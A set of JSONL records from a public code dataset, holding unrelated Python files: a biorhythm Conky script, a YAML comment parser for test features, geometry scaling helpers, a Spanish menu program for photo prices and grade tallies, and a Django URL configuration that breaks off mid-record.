+{"seq_id":"296008374","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nShow biorhythm warnings like the KOSMOS-1 calculator with Conky\nP: physical\nE: emotional\nI: intellectual\n\n2013-08-23\n\nRed: critical days\nOrange: mini-critical days\nSee http://decodesystems.com/kosmos-1.html\n\nDominant cycle is shown in parentheses.\n\nargument 1: number of days in advance (today = 0)\n\n\"\"\"\n\ndd,mm,yy=1,1,1990\n\nfrom datetime import date\nfrom sys import argv\nfrom math import sin,pi\n\nt0 = date(yy,mm,dd).toordinal()\nt1 = date.today().toordinal()\n\nwa=(\n((1,12,13),(7,18)),\n((1,15),(8,22)),\n((1,17,18),(9,26))\n)\n\ns = {'_': '${color green}●${color}', 'y': '${color yellow}●${color}', 'r': '${color red}●${color}'}\n\nout = \"\"\n\nt = t1 + int(argv[1])\n\nw = ['_','_','_']\no = ['*','*','*']\nperc = [0,0,0]\nfor c in range(3):\n p = 23+5*c\n perc[c] = 100.*sin(2*pi*(t-t0)/p)\n v = ((t-t0) % p)+1\n if (v-1) <= p/2:\n o[c] = 'H'\n if (v-1) >= p/2:\n o[c] = 'T'\n if v in wa[c][0]:\n w[c] = 'r'\n o[c] = 'K'\n if v in wa[c][1]:\n w[c] = 'y'\nfor x in w:\n out += s[x] + ' '\nfor x in o:\n out += x + ' '\n\nif perc[0]>perc[1] and perc[0]>perc[2]:\n out += '(P)'\nelif perc[1]>perc[0] and perc[1]>perc[2]:\n out += '(E)'\nelse:\n out += '(I)'\n\nprint(out)\n","repo_name":"trivedisorabh/PyoRhythm","sub_path":"conky/bioconky.py","file_name":"bioconky.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"70883799132","text":"import re\nimport yaml\n\nMF_ID_KEYWORD = \"MF\"\nMF_COMMENT_KEYWORD = \"Comment\"\nMF_SIGNATURE = \"#MF:\"\nMF_PATTERN = re.compile(\"([ \\t]*#MF:.*(\\r\\n?|\\n)([ \\t]*#([^M][^F][^:])?.*(\\r\\n?|\\n))*)\")\n\ndef occurence_ranges(occs, text):\n pairs = []\n for occ in occs:\n pos = text.find(occ, pairs[-1][-1] if len(pairs) > 0 else None)\n if pos >= 0:\n pairs.append((pos, pos+len(occ)))\n return pairs\n\ndef line_ranges(text):\n return occurence_ranges(text.splitlines(True), text)\n\ndef pattern_occurences(regexp, text):\n def filter_tuples(match):\n if isinstance(match, tuple):\n return match[0]\n return match\n\n matches = map(filter_tuples,regexp.findall(text))\n return occurence_ranges(matches, text)\n\nclass InplaceMustfailParser(object):\n \"\"\"\n MF is the commented YAML text, having the following convention:\n MF - field for MF id\n Comment - field for comments\n Other fields may be introduced in later versions\n\n Example 1:\n #MF: BUG-45\n #Comment: |\n # first line of comment\n # last line\n\n Example 2:\n #MF: http://mybugtracker/ID33\n #Comment: bla bla bla\n \"\"\"\n\n def __init__(self, feature):\n self.feature_text = feature.original_string\n self.mf_occs = pattern_occurences(MF_PATTERN, feature.original_string)\n self.line_occs = line_ranges(feature.original_string)\n self.linenum2mf = self.__map_lines_mfs()\n self.mf_dict = self.__as_dict(feature)\n\n def __map_lines_mfs(self):\n def mf_on_line(mf, line):\n line_start, line_end = line\n mf_start, mf_end = mf\n mf_end = mf_end if mf_start == mf_end else mf_end-1\n return line_start <= mf_end < line_end\n\n nline2mf = {}\n try:\n nlines = enumerate(self.line_occs)\n n, line = next(nlines)\n for mf in self.mf_occs:\n while True:\n if mf_on_line(mf, line):\n nline2mf[n+1] = mf\n break\n n, line = next(nlines)\n except StopIteration:\n pass\n return nline2mf\n\n def __len__(self):\n return len(self.mf_dict)\n\n def __item_under_mf(self,linenum):\n return (linenum-1) in self.linenum2mf\n\n def __mf_text_for_line(self, linenum):\n start, end = self.linenum2mf[linenum-1]\n return self.feature_text[start:end]\n\n def __create_mf_item(self, pattern, mf_text, linenum):\n text = mf_text.replace(\"#\", \"\")\n d = yaml.load(text)\n result = {'pattern' : pattern}\n if MF_ID_KEYWORD in d:\n result[\"id\"] = d[MF_ID_KEYWORD]\n if MF_COMMENT_KEYWORD in d:\n result['comment'] = d[MF_COMMENT_KEYWORD]\n result['line'] = linenum\n return result\n\n def __check_add_mf(self, linenum, name, lst_to_add):\n if self.__item_under_mf(linenum):\n lst_to_add.append(\n self.__create_mf_item('.*?{name}.*?'.format(name=name),\n self.__mf_text_for_line(linenum),\n linenum))\n\n def as_dict(self):\n return self.mf_dict\n\n def __as_dict(self, feature):\n mf = {}\n mf_scenarios = []\n mf_steps = []\n mf_features = []\n\n self.__check_add_mf(feature.described_at.line, feature.name, mf_features)\n\n for scenario in feature.scenarios:\n self.__check_add_mf(scenario.described_at.line, scenario.name, mf_scenarios)\n for step in scenario.steps:\n self.__check_add_mf(step.described_at.line, step.sentence, mf_steps)\n\n if len(mf_features) > 0:\n mf['features'] = mf_features\n if len(mf_scenarios) > 0:\n mf['scenarios'] = mf_scenarios\n if len(mf_steps) > 0:\n mf['steps'] = mf_steps\n\n return {'MustFail': mf} if len(mf) > 0 else 
{}\n\n","repo_name":"griddynamics/bunch","sub_path":"lettuce_bunch/mustfail.py","file_name":"mustfail.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"38919071332","text":"# https://programmers.co.kr/learn/courses/30/lessons/12951\n# JadenCase 문자열 만들기\n\ndef solution(s):\n s = list(s)\n start = 0\n \n for i in range(len(s)):\n if start == 0 and s[i].isalpha():\n s[i] = s[i].upper()\n elif s[i].isalpha():\n s[i] = s[i].lower()\n if s[i] == \" \":\n start = 0\n else:\n start = start + 1\n\n return \"\".join(s)","repo_name":"miche715/Programmers-Algorithm","sub_path":"python/p_12951.py","file_name":"p_12951.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"32756154905","text":"from functools import partial\n\ntry:\n from shapely.geometry import mapping, shape\n from shapely.geos import TopologicalError\nexcept ImportError:\n pass\ntry:\n import numpy as np\nexcept ImportError:\n pass\ntry:\n import visvalingamwyatt as vw\nexcept ImportError:\n pass\n\n\ndef clipper(bbox):\n \"\"\"\n Create a clipping function for a given bounding box.\n\n Args:\n bbox (tuple): bounding box\n\n Returns:\n function that will given geometries to input bounding box\n \"\"\"\n minx, miny, maxx, maxy = bbox\n bounds = {\n \"type\": \"Polygon\",\n \"coordinates\": [[(minx, miny), (minx, maxy), (maxx, maxy), (maxx, miny), (minx, miny)]],\n }\n try:\n bbox_shape = shape(bounds)\n\n def func(geometry):\n # This is technically only needed in Py3, but whatever.\n try:\n clipped = bbox_shape.intersection(shape(geometry))\n except (ValueError, TopologicalError):\n return geometry\n\n return mapping(clipped)\n\n except NameError:\n\n def func(geometry):\n return geometry\n\n return func\n\n\ndef clip(geometry, bounds):\n \"\"\"\n Clip a geometry to a bounding box. Equivalent to calling clipper(bounds)(geometry).\n\n Args:\n geometry (dict): geometry object\n bounds (tuple): bounding box\n\n Returns:\n (dict) geometry\n \"\"\"\n try:\n return clipper(bounds)(geometry)\n\n except NameError:\n return geometry\n\n\ndef simplifier(ratio):\n \"\"\"\n Create a simplification function, if visvalingamwyatt is available.\n Otherwise, return a noop function.\n\n Args:\n ratio (int): Between 1 and 99\n\n Returns:\n simplification function\n \"\"\"\n try:\n # put this first to get NameError out of the way\n simplify = vw.simplify_geometry\n\n if ratio is None or ratio >= 100 or ratio < 1:\n raise SvgisError(\"Invalid ratio\")\n\n return partial(simplify, ratio=ratio / 100.0)\n\n except (TypeError, ValueError, NameError):\n return None\n\n\ndef scale(coordinates, scalar=1):\n '''Scale a list of coordinates by a scalar. 
Only use with projected coordinates'''\n try:\n try:\n arr = np.array(coordinates, dtype=float)\n\n except TypeError:\n arr = np.array(list(coordinates), dtype=float)\n\n return arr * scalar\n\n except NameError:\n if isinstance(coordinates, tuple):\n return [coordinates[0] * scalar, coordinates[1] * scalar]\n\n return [(c[0] * scalar, c[1] * scalar) for c in coordinates]\n\n\ndef scale_rings(rings, factor=1):\n \"\"\"Apply scale() to a list of rings.\"\"\"\n return [scale(ring, factor) for ring in rings]\n\n\ndef scale_geom(geom, factor=1):\n \"\"\"\n Scale a geometry by a given factor\n\n Args:\n geom (dict): geojson-like dict\n factor (numeric): scale factor, default: 1\n \"\"\"\n if geom['type'] == 'MultiPolygon':\n geom['coordinates'] = [scale_rings(rings, factor) for rings in geom['coordinates']]\n\n elif geom['type'] in ('Polygon', 'MultiLineString'):\n geom['coordinates'] = scale_rings(geom['coordinates'], factor)\n\n elif geom['type'] in ('MultiPoint', 'LineString'):\n geom['coordinates'] = scale(geom['coordinates'], factor)\n\n elif geom['type'] == 'Point':\n geom['coordinates'] = scale(geom['coordinates'], factor)\n\n elif geom['type'] == 'GeometryCollection':\n geom['geometries'] = [scale_geom(i) for i in geom['geometries']]\n\n else:\n raise NotImplementedError(f\"Unsupported geometry type: {geom['type']}\")\n\n return geom\n","repo_name":"fitnr/svgis","sub_path":"src/svgis/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"32"}
+{"seq_id":"1961992544","text":"############################################################################################################################\n#PROGRAMA DE FOTOGRAFIAS\nimport re\ndef Fotografias():\n total = 0\n\n print(\"\\n######################################\\n#Bienvenido Al Sistema De Fotografias#\\n######################################\\n\")\n \n Cantidad_Fotos = int(input(\"\\nIngrese La Cantidad De Fotografias\\n\"))\n\n Tipo_Fotografia = input(\"\\nTipo de fotografía: a)Blanco y negro b)Color\\n\")\n Tipo_Fotografia = Tipo_Fotografia.upper()\n\n Tamaño_Foto = int(input(\"\\nTamaño de las fotografías: 1.-4 x 6 2.-6x8 3.-8x10 4.-10x12\\n\"))\n\n #EVALUAMOS SI EL TIPO DE LA FOTOGRAFIA ES A BLANCO Y NEGRO\n if Tipo_Fotografia == \"A\":\n \n #EVALUAMOS EL TAMAÑO DE LA FOTOGRAFIA SI SELECCIONA UNA OPCION NO DISPONIBLE MOSTRARA UN MENSAJE AL USUARIO\n if Tamaño_Foto == 1: \n total = (1.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 2:\n total = (3.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 3:\n total = (5.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 4: \n total = (10.0 * Cantidad_Fotos)\n \n else:\n print(\"Opcion Seleccionada No Disponible\")\n\n #EVALUAMOS SI EL TIPO DE LA FOTOGRAFIA ES A COLOR\n elif Tipo_Fotografia == \"B\":\n\n #EVALUAMOS EL TAMAÑO DE LA FOTOGRAFIA SI SELECCIONA UNA OPCION NO DISPONIBLE MOSTRARA UN MENSAJE AL USUARIO\n if Tamaño_Foto == 1: \n total = (5.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 2:\n total = (12.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 3:\n total = (15.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 4: \n total = (18.5 * Cantidad_Fotos)\n \n else:\n print(\"Opcion Seleccionada No Disponible\")\n\n #SI NO ES NI A BLANCO Y NEGRO NI A COLOR MOSTRARA MENSAJE DE OPCION NO DISPONIBLE\n else:\n print(\"Opcion Seleccionada No Disponible\") \n\n servicio = input(\"\\n¿El Servicio Será Impreso o por correo electrónico? 
#######################################################################################################################################\n#GRADES PROGRAM\ndef Calificaciones(estudiantes):\n\n    #VARIABLE TO HOLD EACH STUDENT'S GRADE\n    calificacion = 0\n\n    #ACCUMULATORS FOR THE NUMBER OF STUDENTS WITH EACH GRADE\n    calificaciones7 = 0\n    calificaciones8 = 0\n    calificaciones9 = 0\n    calificaciones10 = 0\n\n    #ACCUMULATORS FOR THE STUDENTS WHO PASSED AND THOSE WHO DID NOT\n    estudiantes_aprobados = 0\n    estudiantes_reprobados = 0\n\n    #VARIABLES FOR THE TEXT CHART IF THE USER CHOOSES THAT OPTION\n    A = \"\"\n    R = \"\"\n    \n\n    #THIS FOR LOOP READS THE STUDENTS' GRADES AND TALLIES THE PASSED AND FAILED STUDENTS\n    for i in range(estudiantes):\n        calificacion = int(input(f\"\\nIngrese la Calificacion N° {i + 1}\\n\" )) \n        if calificacion >= 7:\n            estudiantes_aprobados = estudiantes_aprobados + 1\n            if calificacion == 7:\n                calificaciones7 = calificaciones7 + 1\n            if calificacion == 8:\n                calificaciones8 = calificaciones8 + 1\n            if calificacion == 9:\n                calificaciones9 = calificaciones9 + 1 \n            if calificacion == 10:\n                calificaciones10 = calificaciones10 + 1 \n        else:\n            estudiantes_reprobados = estudiantes_reprobados + 1\n\n    print(f\"\\nEstudiantes con una calificación de 7: {calificaciones7}\")\n    print(f\"Estudiantes con una calificación de 8: {calificaciones8}\")\n    print(f\"Estudiantes con una calificación de 9: {calificaciones9}\")\n    print(f\"Estudiantes con una calificación de 10: {calificaciones10}\")\n\n    print(f\"\\nEstudiantes Que Reprobaron: {estudiantes_reprobados}\\nEstudiantes Que Aprobaron: {estudiantes_aprobados}\")\n    \n    graficar = input(\"\\n¿Desea Graficar Los Resultados S/N?:\\n\")\n    graficar = graficar.upper()\n\n    if graficar == \"S\":\n        for i in range (estudiantes_aprobados):\n            A = A + \"**\"\n        \n        for i in range (estudiantes_reprobados):\n            R = R + \"**\"\n\n        print(f\"\\n--------GRÁFICA---------\\nA {A}\\nR {R}\\n\")\n        import matplotlib.pyplot as plt\n\n        #USE MATPLOTLIB TO SHOW A BAR CHART OF THE STUDENTS WHO SCORED 7, 8, 9 AND 10\n        #Array with the grades as strings\n        calificacionestxt = ['Calificacion 7', 'Calificacion 8', 'Calificacion 9', 'Calificacion 10']\n        #Array with the count of students per grade\n        calificacionesval = [calificaciones7 , calificaciones8 , calificaciones9 , calificaciones10 ]\n\n        fig, ax = plt.subplots()\n        #Put a label on the Y axis\n        ax.set_ylabel('CANTIDAD DE PERSONAS')\n        #Set the chart title\n        ax.set_title('Promedio De Calificaciones APROBATORIAS')\n        #Create the bar chart using the grades as the X axis and the number of students as the Y axis.\n        plt.bar(calificacionestxt, calificacionesval)\n        \n        #Show the chart with the show() method\n        gr = plt.show()\n        return gr\n    else:\n        print(\"Saliendo...\\n\") \n
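#ILLUSTRATIVE CALL (note added for reference): Calificaciones(3) prompts for three grades, prints the per-grade and pass/fail tallies, and, if the user answers \"S\", draws the text chart plus the matplotlib bar chart.\n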
##############################################################################################################################\n#MAIN PROGRAM\n#LOOP UNTIL THE USER PICKS OPTION 3 OR ANY OPTION OTHER THAN 1 AND 2\nwhile True:\n    print(\"********************************\\n***** Bienvenido Al Menu *****\\n********************************\\n1. Fotografías 2.Calificaciones 3. Salir\")\n    opcion = int(input(\"Seleccione Una Opcion\\n\"))\n    \n    #CALL THE PHOTOGRAPHS FUNCTION AND RUN ITS PROCESS\n    if opcion == 1:\n        Fotografias()\n    #CALL THE GRADES FUNCTION AND RUN ITS PROCESS; IT TAKES A PARAMETER AND RETURNS A VALUE DEPENDING ON THE USER'S SELECTION\n    elif opcion == 2:\n        print(\"\\n#########################################\\n#Bienvenido Al Sistema De Calificaciones#\\n#########################################\\n\")\n        \n        estudiantes = int(input(\"Cantidad de estudiantes en el grupo:\\n\"))\n        Calificaciones(estudiantes)\n    #IF THE USER PICKS OPTION 3 OR ANYTHING OTHER THAN 1 OR 2, PRINT AN EXIT MESSAGE AND END\n    else:\n        print(\"Saliendo...\")\n        break ","repo_name":"MeXinuX/Calificaciones-Fotografias","sub_path":"photo&¬es.py","file_name":"photo&¬es.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7718342276","text":"\"\"\"Posts URL Configuration\"\"\"\n\nfrom django.urls import path\nfrom posts import views\n\nurlpatterns = [\n\n path('home/', views.HomePostsList.as_view(), name='home'),\n #path('new-post/', views.new_post, name='new-post'),\n path('new-post/', views.CreatePostView.as_view(), name='new-post'),\n path('like/', views.new_like, name='like'),\n path('/new-comment/', views.new_comment, name='new-comment'),\n #path('/comments/', views.list_comments, name='show-comments'),\n path('/comments/', views.PostDetail.as_view(), name='show-comments'),\n #path('//comments/', views.list_comments, name='show-comments-reply'),\n path('//comments/', views.PostDetail.as_view(), name='show-comments-reply'),\n path('/likes/', views.list_likes, name='show-likes'),\n path('saved_posts/', views.list_saved_posts, name='show-saved'),\n path('save_post/', views.save_post, name='save'),\n path('/delete/', views.delete_post, name='delete'),\n path('/like/', views.like_comment, name='comment-like'),\n path('/reply/', views.new_reply, name='reply'),\n path('